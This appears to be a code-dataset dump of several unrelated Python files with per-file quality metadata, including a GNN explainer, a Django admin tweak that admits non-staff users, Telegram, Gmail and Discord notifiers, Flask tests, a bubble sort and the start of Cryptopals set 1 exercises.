parameters = [self.node_feat_mask, self.edge_mask]
else:
parameters = [self.node_feat_mask]
optimizer = torch.optim.Adam(parameters, lr=self.lr)
if self.log: # pragma: no cover
pbar = tqdm(total=self.epochs)
pbar.set_description('Explain graph')
for epoch in range(1, self.epochs + 1):
optimizer.zero_grad()
h = x * self.node_feat_mask.sigmoid()
out = self.model(x=h, edge_index=edge_index, batch=batch, **kwargs)
loss = self.get_loss(out, prediction, None)
loss.backward()
optimizer.step()
if self.log: # pragma: no cover
pbar.update(1)
if self.log: # pragma: no cover
pbar.close()
node_feat_mask = self.node_feat_mask.detach().sigmoid().squeeze()
if self.allow_edge_mask:
edge_mask = self.edge_mask.detach().sigmoid()
else:
edge_mask = torch.ones(edge_index.size(1))
self._clear_masks()
return node_feat_mask, edge_mask
def explain_node(self, node_idx, x, edge_index, **kwargs):
r"""Learns and returns a node feature mask and an edge mask that play a
crucial role to explain the prediction made by the GNN for node
:attr:`node_idx`.
Args:
node_idx (int): The node to explain.
x (Tensor): The node feature matrix.
edge_index (LongTensor): The edge indices.
**kwargs (optional): Additional arguments passed to the GNN module.
:rtype: (:class:`Tensor`, :class:`Tensor`)
"""
self.model.eval()
self._clear_masks()
num_nodes = x.size(0)
num_edges = edge_index.size(1)
# Only operate on a k-hop subgraph around `node_idx`.
x, edge_index, mapping, hard_edge_mask, subset, kwargs = \
self.subgraph(node_idx, x, edge_index, **kwargs)
# Get the initial prediction.
prediction = self.get_initial_prediction(x, edge_index, **kwargs)
self._initialize_masks(x, edge_index)
self.to(x.device)
if self.allow_edge_mask:
set_masks(self.model, self.edge_mask, edge_index,
apply_sigmoid=True)
parameters = [self.node_feat_mask, self.edge_mask]
else:
parameters = [self.node_feat_mask]
optimizer = torch.optim.Adam(parameters, lr=self.lr)
if self.log: # pragma: no cover
pbar = tqdm(total=self.epochs)
pbar.set_description(f'Explain node {node_idx}')
for epoch in range(1, self.epochs + 1):
optimizer.zero_grad()
h = x * self.node_feat_mask.sigmoid()
out = self.model(x=h, edge_index=edge_index, **kwargs)
loss = self.get_loss(out, prediction, mapping)
loss.backward()
optimizer.step()
if self.log: # pragma: no cover
pbar.update(1)
if self.log: # pragma: no cover
pbar.close()
node_feat_mask = self.node_feat_mask.detach().sigmoid()
if self.feat_mask_type == 'individual_feature':
new_mask = x.new_zeros(num_nodes, x.size(-1))
new_mask[subset] = node_feat_mask
node_feat_mask = new_mask
elif self.feat_mask_type == 'scalar':
new_mask = x.new_zeros(num_nodes, 1)
new_mask[subset] = node_feat_mask
node_feat_mask = new_mask
node_feat_mask = node_feat_mask.squeeze()
if self.allow_edge_mask:
edge_mask = self.edge_mask.new_zeros(num_edges)
edge_mask[hard_edge_mask] = self.edge_mask.detach().sigmoid()
else:
edge_mask = torch.zeros(num_edges)
edge_mask[hard_edge_mask] = 1
self._clear_masks()
return node_feat_mask, edge_mask
def __repr__(self):
return f'{self.__class__.__name__}()'
```
avg_line_length: 39.037594 | max_line_length: 79 | alphanum_fraction: 0.600443
qsc_code_*_quality_signal (zero-valued entries omitted): num_words=1,357, num_chars=10,384, mean_word_length=4.397937, frac_words_unique=0.180545, frac_chars_top_2grams=0.045576, frac_chars_top_3grams=0.044236, frac_chars_top_4grams=0.032172, frac_chars_dupe_5grams=0.561327, frac_chars_dupe_6grams=0.511227, frac_chars_dupe_7grams=0.468834, frac_chars_dupe_8grams=0.427279, frac_chars_dupe_9grams=0.41756, frac_chars_dupe_10grams=0.396783, frac_chars_digital=0.008545, frac_chars_whitespace=0.289965, size_file_byte=10,384, num_lines=265, num_chars_line_max=80, num_chars_line_mean=39.184906, frac_chars_alphabet=0.800895, frac_chars_comments=0.305759, frac_lines_dupe_lines=0.44586, frac_chars_string_length=0.048978, frac_chars_long_word_length=0.003912, frac_lines_assert=0.006369
qsc_codepython_*_quality_signal: cate_ast=1, frac_lines_func_ratio=0.044586, cate_var_zero=false, frac_lines_pass=0, frac_lines_import=0.031847, frac_lines_simplefunc=0.006369, score_lines_no_logic=0.11465, frac_lines_print=0
unsuffixed duplicate qsc_* columns: all 0 (frac_words_unique and frac_lines_string_concat are null) | effective: 1 | hits: 0
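For context, a minimal usage sketch of the `GNNExplainer` defined above; the toy model and data are invented, and the import path may differ between PyG versions:

```python
import torch
from torch_geometric.nn import GCNConv, GNNExplainer  # path may vary by version

class Net(torch.nn.Module):
    def __init__(self):
        super().__init__()
        self.conv = GCNConv(3, 2)

    def forward(self, x, edge_index):
        return torch.log_softmax(self.conv(x, edge_index), dim=-1)

x = torch.randn(4, 3)
edge_index = torch.tensor([[0, 1, 2, 3], [1, 0, 3, 2]])

explainer = GNNExplainer(Net(), epochs=20, return_type='log_prob')
node_feat_mask, edge_mask = explainer.explain_node(0, x, edge_index)
# Both masks lie in [0, 1]: per-feature and per-edge importances.
```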
hexsha: af2bf330f5c58cef255d60fd7059e9b558223019 | size: 552 | ext: py | lang: Python
max_stars / max_issues / max_forks: counts null, events null; path services/web/freq_demo/admin.py, repo mnesvold/freq, head 27fb15a825e44458c776f4135abf516e751b3fb8, licenses ["MIT"] (identical for all three)
content:
```python
from django.contrib import admin
from django.contrib.auth.forms import AuthenticationForm
def customize_admin():
admin.site.site_header = 'Feature Request Tracker'
admin.site.site_title = 'Freq'
admin.site.index_title = 'Track Feature Requests with Freq'
admin.site.site_url = None
# allow non-staff users to access admin views
def is_user_active(request):
return request.user.is_active
admin.site.has_permission = is_user_active
# allow non-staff users to log in
admin.site.login_form = AuthenticationForm
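For these customizations to take effect, customize_admin() must run at startup; a hedged sketch wiring it up via AppConfig.ready() (the app label `freq_demo` is inferred from the file path and is an assumption):

# Hedged wiring sketch; not part of the original file.
from django.apps import AppConfig

class FreqDemoConfig(AppConfig):
    name = 'freq_demo'  # assumption: matches the app package name

    def ready(self):
        from .admin import customize_admin
        customize_admin()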
| 32.470588
| 63
| 0.75
| 78
| 552
| 5.153846
| 0.512821
| 0.134328
| 0.097015
| 0.089552
| 0.099502
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.177536
| 552
| 16
| 64
| 34.5
| 0.885463
| 0.13587
| 0
| 0
| 0
| 0
| 0.124473
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.181818
| false
| 0
| 0.181818
| 0.090909
| 0.454545
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af2ded2bcaaf00693925512eeea11c00ded8df3d
| 3,842
|
py
|
Python
|
TelegramBot/TelegramBot.py
|
Henrik168/TelegramBot
|
6b11fc47218d616f1a4acfe7ac6494cb802491b9
|
[
"MIT"
] | null | null | null |
TelegramBot/TelegramBot.py
|
Henrik168/TelegramBot
|
6b11fc47218d616f1a4acfe7ac6494cb802491b9
|
[
"MIT"
] | null | null | null |
TelegramBot/TelegramBot.py
|
Henrik168/TelegramBot
|
6b11fc47218d616f1a4acfe7ac6494cb802491b9
|
[
"MIT"
] | null | null | null |
import logging
from dataclasses import dataclass
import TelegramBot.lib_requests as lib_requests
import CustomLogger
@dataclass
class MessageData:
last_message: str
chatroom_id: str
sender_id: str
sender_name: str
@property
def command(self):
        if not self.last_message.startswith("/"):
            return None
if "@" in self.last_message:
return self.last_message.split("@")[0]
elif " " in self.last_message:
return self.last_message.split(" ")[0]
else:
return self.last_message
class TelegramError(Exception):
    def __init__(self, text: str, chatroom_id: str = "0"):
        self.text = text  # bug fix: a trailing comma here previously made `text` a 1-tuple
        self.chatroom_id = chatroom_id
class TelegramBot:
def __init__(self, bot_token: str,
logger: logging.Logger = None):
"""
:param bot_token:
:param logger:
"""
self.bot_token = bot_token
self.url = "https://api.telegram.org/bot" + self.bot_token
self.update_id = 0
self.logger = logger if logger else CustomLogger.getLogger()
def request_bot_info(self) -> dict:
"""Request Bot Info"""
result = lib_requests.http_request(self.url + "/getMe")
if not result["result"]["username"]:
raise TelegramError('Missing data result["result"]["username"]')
self.logger.debug(f"Request Bot Info: {result}")
return result["result"]["username"]
def send_text(self, message: str, chatroom_id: str) -> None:
"""Send Text Message"""
params = {"chat_id": chatroom_id, "text": message}
result = lib_requests.http_request(self.url + "/sendMessage", params)
if not result["ok"]:
raise TelegramError(f"Error sending Text Message: {message} to Chatroom{chatroom_id}")
self.logger.debug(f"Send Text Message: {message} to Chatroom {chatroom_id}")
def send_photo(self, file: bytes, chatroom_id: str) -> None:
if not file:
raise TelegramError(f"Got not bytes Object to send a photo.")
# send file to chat
params = {"chat_id": chatroom_id}
payload = {"photo": file}
result = lib_requests.http_request(self.url + "/sendPhoto", params, payload)
if not result["ok"]:
self.send_text(result["description"], chatroom_id)
raise TelegramError(f"Error sending Photo to Chatroom: {chatroom_id} Response: {result}")
self.logger.debug(f"Send Photo to chat: {chatroom_id}")
def request_message(self) -> MessageData:
"""
Request Last messages.
:return:
"""
params = {"offset": self.update_id + 1}
response = lib_requests.http_request(self.url + "/getUpdates", params)
if not response["ok"]:
raise TelegramError(f"Failure in Response: {response}")
if len(response["result"]) == 0:
return
        # take the first (oldest) pending update and wrap it in MessageData
message = response["result"][0]
self.logger.debug(f"Got message: {message}")
# store last update ID for requesting just newer Messages
self.update_id = message["update_id"]
if "message" not in message.keys():
raise TelegramError(f"Not a Text Message {message}", chatroom_id=message["message"]["chat"]["id"])
if "text" not in message["message"].keys():
raise TelegramError(f"Not a Text Message {message}", chatroom_id=message["message"]["chat"]["id"])
return MessageData(last_message=str(message["message"]["text"]),
chatroom_id=str(message["message"]["chat"]["id"]),
sender_id=str(message["message"]["from"]["id"]),
sender_name=str(message["message"]["from"]["first_name"])
)
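A hedged polling-loop sketch around the class above (BOT_TOKEN is a placeholder; request_message() returns None while nothing new is pending):

# Hedged usage sketch; not part of the original file.
import time

bot = TelegramBot(bot_token="BOT_TOKEN")  # placeholder token
while True:
    try:
        msg = bot.request_message()
        if msg and msg.command == "/ping":
            bot.send_text("pong", msg.chatroom_id)
    except TelegramError as error:
        print(error.text)
    time.sleep(1)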
| 35.574074
| 110
| 0.60151
| 453
| 3,842
| 4.960265
| 0.203091
| 0.071206
| 0.040053
| 0.039163
| 0.291055
| 0.205607
| 0.192701
| 0.11215
| 0.11215
| 0.11215
| 0
| 0.002857
| 0.271213
| 3,842
| 107
| 111
| 35.906542
| 0.799643
| 0.05518
| 0
| 0.083333
| 0
| 0
| 0.195836
| 0.013787
| 0
| 0
| 0
| 0
| 0
| 1
| 0.097222
| false
| 0
| 0.055556
| 0
| 0.347222
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af2fe4de9eede3a49c06c050ed3b255d1c2f19b7
| 2,275
|
py
|
Python
|
Oski/Notifier.py
|
mbanderson/Oski
|
beb68ee5ba4af23d726345d5f726a52d5adfae73
|
[
"MIT"
] | null | null | null |
Oski/Notifier.py
|
mbanderson/Oski
|
beb68ee5ba4af23d726345d5f726a52d5adfae73
|
[
"MIT"
] | null | null | null |
Oski/Notifier.py
|
mbanderson/Oski
|
beb68ee5ba4af23d726345d5f726a52d5adfae73
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
"""Notifies subscribers of new articles."""
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
class Email:
"""Formats email content as a MIME message."""
def __init__(self, sender, receiver, subject, content, use_html=False):
self.sender = str(sender)
self.receiver = receiver
self.subject = subject
self.content = content
if use_html:
self.email = MIMEMultipart("alternative")
else:
self.email = MIMEMultipart()
self.email["Subject"] = self.subject
self.email["From"] = self.sender
self.email["To"] = self.receiver
if use_html:
body = MIMEText(content, "html")
else:
body = MIMEText(content, "plain")
self.email.attach(body)
def __repr__(self):
"""Converts MIME email to sendable format."""
return self.email.as_string()
def change_receiver(self, receiver):
"""Modify email recipient so we can resend to additional users."""
self.receiver = receiver
self.email["To"] = self.receiver
return
class GmailSender:
"""Sends email through Gmail account."""
def __init__(self, user, pwd):
self.user = user
self.server = smtplib.SMTP("smtp.gmail.com:587")
self.server.starttls()
self.server.login(self.user, pwd)
def send_email(self, email):
self.server.sendmail(str(email.sender),
str(email.receiver),
str(email))
return
def __repr__(self):
return self.user
def __del__(self):
return self.server.quit()
class Notifier:
"""Notifies subscribers of content through GmailSender."""
def __init__(self, subscribers, user, pwd):
self.user = user
self.sender = GmailSender(user, pwd)
self.subscribers = subscribers
def mail_subscribers(self, email):
for subscriber in self.subscribers:
email.change_receiver(subscriber)
self.sender.send_email(email)
return
def __repr__(self):
return repr(self.sender)
def main():
return
if __name__ == "__main__":
main()
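A hedged usage sketch for the classes above (addresses and the app password are placeholders):

# Hedged usage sketch; not part of the original file.
email = Email(sender="bot@example.com",
              receiver="",  # overwritten per subscriber by mail_subscribers()
              subject="New article",
              content="<p>A new article is up.</p>",
              use_html=True)
notifier = Notifier(subscribers=["a@example.com", "b@example.com"],
                    user="bot@example.com", pwd="app-password")
notifier.mail_subscribers(email)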
| 27.409639
| 75
| 0.607473
| 256
| 2,275
| 5.222656
| 0.3125
| 0.067315
| 0.024682
| 0.035901
| 0.110696
| 0.07629
| 0
| 0
| 0
| 0
| 0
| 0.001845
| 0.285275
| 2,275
| 83
| 76
| 27.409639
| 0.820418
| 0.126593
| 0
| 0.293103
| 0
| 0
| 0.03117
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.189655
| false
| 0
| 0.051724
| 0.068966
| 0.431034
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af33d38936d36aba5ecfba4eb2562457febb889c
| 673
|
py
|
Python
|
repalette/utils/notify.py
|
danielgafni/repalette
|
9317fc4f164ef04500a47e37a5b0bd3917a82516
|
[
"Apache-2.0"
] | 18
|
2021-05-04T15:26:59.000Z
|
2022-01-04T17:17:23.000Z
|
repalette/utils/notify.py
|
danielgafni/repalette
|
9317fc4f164ef04500a47e37a5b0bd3917a82516
|
[
"Apache-2.0"
] | 3
|
2020-11-07T14:45:28.000Z
|
2021-05-05T17:04:22.000Z
|
repalette/utils/notify.py
|
danielgafni/repalette
|
9317fc4f164ef04500a47e37a5b0bd3917a82516
|
[
"Apache-2.0"
] | 2
|
2021-05-04T15:54:31.000Z
|
2021-05-05T00:15:20.000Z
|
import asyncio
import discord
import nest_asyncio
from repalette.constants import DISCORD_BOT_TOKEN
async def __notify_discord(channel_id, message):
client = discord.Client()
async def __send_message():
await client.wait_until_ready()
await client.get_channel(channel_id).send(message)
await client.close()
client.loop.create_task(__send_message())
await client.start(DISCORD_BOT_TOKEN)
def notify_discord(channel_id, message):
nest_asyncio.apply()
loop = asyncio.get_event_loop()
loop.run_until_complete(
__notify_discord(
channel_id=channel_id,
message=message,
)
)
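A hedged call-site sketch (the channel id is a placeholder; the bot token is read from repalette.constants inside the coroutine):

# Hedged usage sketch; not part of the original file.
notify_discord(channel_id=123456789012345678,
               message="Training finished!")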
| 21.709677
| 58
| 0.702823
| 82
| 673
| 5.378049
| 0.378049
| 0.102041
| 0.136054
| 0.14966
| 0.145125
| 0.145125
| 0
| 0
| 0
| 0
| 0
| 0
| 0.218425
| 673
| 30
| 59
| 22.433333
| 0.838403
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.047619
| false
| 0
| 0.190476
| 0
| 0.238095
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af34c785490cf98dfc2a7f4269f8b57f92aab889
| 4,404
|
py
|
Python
|
tests/test_main.py
|
sforzando/q-lako
|
dcf31fdc50147415a1da7c5b411568478984e31a
|
[
"MIT"
] | null | null | null |
tests/test_main.py
|
sforzando/q-lako
|
dcf31fdc50147415a1da7c5b411568478984e31a
|
[
"MIT"
] | 79
|
2020-10-06T08:34:44.000Z
|
2020-12-12T17:28:53.000Z
|
tests/test_main.py
|
sforzando/q-lako
|
dcf31fdc50147415a1da7c5b411568478984e31a
|
[
"MIT"
] | null | null | null |
import logging
import pytest
from werkzeug.datastructures import ImmutableMultiDict
from main import app
@pytest.fixture
def test_client():
app.config["TESTING"] = True
return app.test_client()
def test_GET_index(test_client):
response = test_client.get("/")
assert response.status_code == 200
assert b"Registration of equipment and books." in response.data
assert b"Enter one of the following keywords" in response.data
def test_GET_search_with_correct_query(test_client):
response = test_client.get("/search?query=kindle")
assert b"Search results for kindle" in response.data
def test_GET_search_with_incorrect_query(test_client):
response = test_client.get("/search?unexpected_query=kindle", follow_redirects=True)
assert b"Registration of equipment and books." in response.data
assert b"Enter any keywords." in response.data
def test_GET_search_with_not_inputted_query(test_client):
response = test_client.get("/search?query=", follow_redirects=True)
assert b"Registration of equipment and books." in response.data
assert b"Enter any keywords." in response.data
def test_GET_search_direct_access(test_client):
response = test_client.get("/search", follow_redirects=True)
assert b"Registration of equipment and books." in response.data
assert b"Enter any keywords." in response.data
def test_GET_registration_direct_access(test_client):
response = test_client.get("/registration", follow_redirects=True)
assert b"Registration of equipment and books." in response.data
assert b"Enter any keywords." in response.data
def test_POST_registration_success(test_client):
test_client.get("/search?query=UNIX")
response = test_client.post("/registration", data={"asin": "4274064069"})
assert "Registration for details of UNIXという考え方―その設計思想と哲学" in response.data.decode("UTF-8")
def test_POST_registration_failure(test_client):
response = test_client.post("/registration", follow_redirects=True)
assert b"Registration of equipment and books." in response.data
assert b"Please try the procedure again from the beginning, sorry for the inconvenience." in response.data
def test_POST_registration_contributors(test_client):
test_client.get("/search?query=DeepLearning")
response = test_client.post("/registration", data={"asin": "4873117585"})
assert "ゼロから作るDeep Learning ―Pythonで学ぶディープラーニングの理論と実装" in response.data.decode("UTF-8")
assert "斎藤 康毅" in response.data.decode("UTF-8")
def test_POST_registration_publication_date_parse_failed(test_client, caplog):
test_client.get("/search?query=UNIX")
with test_client.session_transaction() as _session:
for product in _session["product_list"]:
product.info.publication_date = "unsupported format"
test_client.post("/registration", data={"asin": "4274064069"})
assert ("__init__", logging.ERROR,
"registration: Parse failed. Unknown string format: unsupported format") in caplog.record_tuples
def test_POST_register_airtable_success(test_client):
imd = ImmutableMultiDict(
[
("image_url", "https://m.media-amazon.com/images/I/210tcugW9ML.jpg"),
("title", "テンマクデザイン サーカス TC DX"),
("url", "https://www.amazon.co.jp/dp/B07XB5WX89?tag=bellonieslog-22&linkCode=osi&th=1&psc=1"),
("asin", "B07XB5WX89"),
("manufacturer", "テンマクデザイン"),
("contributors", None),
("publication_date", None),
("product_group", "Sports"),
("registrants_name", "yusuke-sforzando"),
("default_positions", "sforzando-kawasaki"),
("current_positions", "sforzando-kawasaki"),
("note", ""),
("features", "['サーカスTC DX\\u3000サンドカラー', '【サーカスTCと共通 ●設営が簡単に出来るセットアップガイド付。']")
]
)
test_client.get("/search?query=サーカスTC")
test_client.post("/registration", data={"asin": "B07XB5WX89"})
response = test_client.post("/register_airtable", data=imd, follow_redirects=True)
assert b"Registration completed!" in response.data
def test_POST_register_airtable_failure(test_client):
test_client.get("/search?query=サーカスTC")
test_client.post("/registration", data={"asin": "B07XB5WX89"})
response = test_client.post("/register_airtable", data={}, follow_redirects=True)
assert b"Registration failed." in response.data
| 40.036364
| 110
| 0.719573
| 551
| 4,404
| 5.557169
| 0.275862
| 0.111039
| 0.082299
| 0.055846
| 0.596016
| 0.571522
| 0.510124
| 0.449053
| 0.363488
| 0.317766
| 0
| 0.018423
| 0.161898
| 4,404
| 109
| 111
| 40.40367
| 0.81035
| 0
| 0
| 0.2
| 0
| 0.0125
| 0.340372
| 0.023842
| 0
| 0
| 0
| 0
| 0.25
| 1
| 0.1625
| false
| 0
| 0.05
| 0
| 0.225
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af35346b37ed36d8f98147a976a6e4de22d8db47
| 849
|
py
|
Python
|
data/external/repositories_2to3/126714/kaggle-avazu-master/script/append.py
|
Keesiu/meta-kaggle
|
87de739aba2399fd31072ee81b391f9b7a63f540
|
[
"MIT"
] | null | null | null |
data/external/repositories_2to3/126714/kaggle-avazu-master/script/append.py
|
Keesiu/meta-kaggle
|
87de739aba2399fd31072ee81b391f9b7a63f540
|
[
"MIT"
] | null | null | null |
data/external/repositories_2to3/126714/kaggle-avazu-master/script/append.py
|
Keesiu/meta-kaggle
|
87de739aba2399fd31072ee81b391f9b7a63f540
|
[
"MIT"
] | 1
|
2019-12-04T08:23:33.000Z
|
2019-12-04T08:23:33.000Z
|
f1 = open("../train_pre_1")
f2 = open("../test_pre_1")
out1 = open("../train_pre_1b","w")
out2 = open("../test_pre_1b","w")
t = open("../train_gbdt_out")
v = open("../test_gbdt_out")
add = []
for i in range(30,49):
add.append("C" + str(i))
line = f1.readline()
print(line[:-1] + "," + ",".join(add), file=out1)
line = f2.readline()
print(line[:-1] + "," + ",".join(add), file=out2)
for i in range(40428967):
line = f1.readline()[:-1]
a = t.readline()[:-1]
ll = a.split(" ")[1:]
for j in range(19):
line += "," + add[j] + "_" + ll[j]
print(line, file=out1)
for i in range(4577464):
line = f2.readline()[:-1]
a = v.readline()[:-1]
ll = a.split(" ")[1:]
for j in range(19):
line += "," + add[j] + "_" + ll[j]
print(line, file=out2)
f1.close()
f2.close()
out1.close()
out2.close()
t.close()
v.close()
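The same column-append logic can be written with context managers and zip so every file handle is closed even on error; a hedged, behavior-preserving sketch (paths and row counts kept from the original):

# Hedged rewrite sketch; not part of the original file.
def append_columns(src, gbdt, dst, n_rows, names):
    with open(src) as fin, open(gbdt) as feats, open(dst, "w") as fout:
        header = fin.readline().rstrip("\n")
        print(header + "," + ",".join(names), file=fout)
        for _ in range(n_rows):
            line = fin.readline().rstrip("\n")
            values = feats.readline().rstrip("\n").split(" ")[1:]
            extra = ",".join(f"{n}_{v}" for n, v in zip(names, values))
            print(line + "," + extra, file=fout)

names = ["C" + str(i) for i in range(30, 49)]
append_columns("../train_pre_1", "../train_gbdt_out", "../train_pre_1b", 40428967, names)
append_columns("../test_pre_1", "../test_gbdt_out", "../test_pre_1b", 4577464, names)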
| 23.583333
| 50
| 0.537102
| 138
| 849
| 3.202899
| 0.275362
| 0.079186
| 0.040724
| 0.074661
| 0.380091
| 0.380091
| 0.380091
| 0.248869
| 0.248869
| 0.248869
| 0
| 0.074236
| 0.190813
| 849
| 35
| 51
| 24.257143
| 0.569141
| 0
| 0
| 0.181818
| 0
| 0
| 0.125307
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.121212
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af39c62b461abaa60323cf851d4989edf2ec5def
| 851
|
py
|
Python
|
run_learning.py
|
ZhaomingXie/RLAlg
|
dff9fc9be9417797ded428fc706cd779e638f7bf
|
[
"MIT"
] | null | null | null |
run_learning.py
|
ZhaomingXie/RLAlg
|
dff9fc9be9417797ded428fc706cd779e638f7bf
|
[
"MIT"
] | null | null | null |
run_learning.py
|
ZhaomingXie/RLAlg
|
dff9fc9be9417797ded428fc706cd779e638f7bf
|
[
"MIT"
] | 1
|
2020-05-29T01:37:42.000Z
|
2020-05-29T01:37:42.000Z
|
from PPO import *
from TD3 import *
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("--policy_path", required=True, type=str)
parser.add_argument("--stats_path", required=True, type=str)
parser.add_argument("--env", required=True, type=str)
parser.add_argument("--seed", required=True, type=int)
parser.add_argument("--learn_contact", action='store_true')
args = parser.parse_args()
random.seed(args.seed)
torch.manual_seed(args.seed)
torch.cuda.manual_seed_all(args.seed)
np.random.seed(args.seed)
torch.set_num_threads(args.seed)  # NOTE: ties the thread count to the seed value; this looks unintentional
import gym
env = gym.make(args.env)
env.seed(args.seed)
ppo = RL(env, [256, 256], learn_contact=args.learn_contact)
print(args.learn_contact)
ppo.seed = args.seed
ppo.model_name = args.policy_path
ppo.stats_name = args.stats_path
ppo.save_model(ppo.model_name)
ppo.collect_samples_multithread()
| 31.518519
| 61
| 0.782609
| 135
| 851
| 4.740741
| 0.333333
| 0.0875
| 0.132813
| 0.089063
| 0.253125
| 0.18125
| 0.18125
| 0.125
| 0
| 0
| 0
| 0.00885
| 0.070505
| 851
| 27
| 62
| 31.518519
| 0.800253
| 0
| 0
| 0
| 0
| 0
| 0.071596
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.16
| 0
| 0.16
| 0.04
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af39df71abbbbebb35d3f9fbf9be1554dbe20b3c
| 797
|
py
|
Python
|
Sorting/bubble_sort.py
|
fredricksimi/leetcode
|
f6352c26914ca77f915f5994746ecf0b36efc89b
|
[
"MIT"
] | null | null | null |
Sorting/bubble_sort.py
|
fredricksimi/leetcode
|
f6352c26914ca77f915f5994746ecf0b36efc89b
|
[
"MIT"
] | null | null | null |
Sorting/bubble_sort.py
|
fredricksimi/leetcode
|
f6352c26914ca77f915f5994746ecf0b36efc89b
|
[
"MIT"
] | 1
|
2021-12-05T12:27:46.000Z
|
2021-12-05T12:27:46.000Z
|
"""
Bubble Sort:
"""
# Best: O(n) time | O(1) space
# Average: O(n^2) time | O(1) space
# Worst: O(n^2) time | O(1) space
def bubbleSort(array):
did_swap = False
while True:
did_swap = False
for idx in range(1, len(array)):
if array[idx] < array[idx-1]:
# swap
array[idx], array[idx-1] = array[idx-1], array[idx]
did_swap = True
if not did_swap:
return array
"""
Traverse the input array, swapping any two numbers that are out of order and keeping track of any swaps that you make.
Once you arrive at the end of the array, check if you have made any swaps;
if not, the array is sorted and you are done; otherwise, repeat the steps laid out in this hint until the array is sorted.
"""
| 26.566667
| 122
| 0.604768
| 131
| 797
| 3.648855
| 0.473282
| 0.100418
| 0.037657
| 0.069038
| 0.165272
| 0.058577
| 0.058577
| 0
| 0
| 0
| 0
| 0.016043
| 0.29611
| 797
| 29
| 123
| 27.482759
| 0.836007
| 0.141782
| 0
| 0.2
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
af3d1abf4c4665c9462b07e2b917b4a51a0fdfc4
| 1,715
|
py
|
Python
|
ccs1.py
|
derrickaw/operation_crypto
|
6bf006a0a9246f6a9c5ae64b1bb395cc9d951c72
|
[
"MIT"
] | null | null | null |
ccs1.py
|
derrickaw/operation_crypto
|
6bf006a0a9246f6a9c5ae64b1bb395cc9d951c72
|
[
"MIT"
] | null | null | null |
ccs1.py
|
derrickaw/operation_crypto
|
6bf006a0a9246f6a9c5ae64b1bb395cc9d951c72
|
[
"MIT"
] | null | null | null |
# Crypto Challenge Set 1
"""
1. Convert hex to base64
2. Fixed buffer XOR
3.
"""
import base64
def convert_hex_to_base64(hex):
"""
Converts hex string to base64 encoding
:param hex: hex encoded string
:return: base64 encoded string
"""
# Convert hex to byte string
decoded_hex = bytearray.fromhex(hex)
# Convert byte string to base64 encoded string; then convert to string
encoded_base64_str = bytes.decode(base64.b64encode(decoded_hex))
return encoded_base64_str
def xor_fixed_buffers(buf1, buf2):
"""
Creates XOR buffered string from two hex string buffers
:param buf1: hex encoded string
:param buf2: hex encoded string
:return: xor hex encoded string
"""
# Convert hex to bytearray
decoded_hex_buf1 = bytearray.fromhex(buf1)
decoded_hex_buf2 = bytearray.fromhex(buf2)
# XOR by byte
xor_buf = bytearray(len(decoded_hex_buf1))
for i in range(len(xor_buf)):
xor_buf[i] = decoded_hex_buf1[i] ^ decoded_hex_buf2[i]
# Convert back to hex string
xor_buf = bytes(xor_buf).hex()
return xor_buf
if __name__ == '__main__':
# 1. Convert hex to base64
assert convert_hex_to_base64('49276d206b696c6c696e6720796f757'
'220627261696e206c696b6520612070'
'6f69736f6e6f7573206d757368726f6'
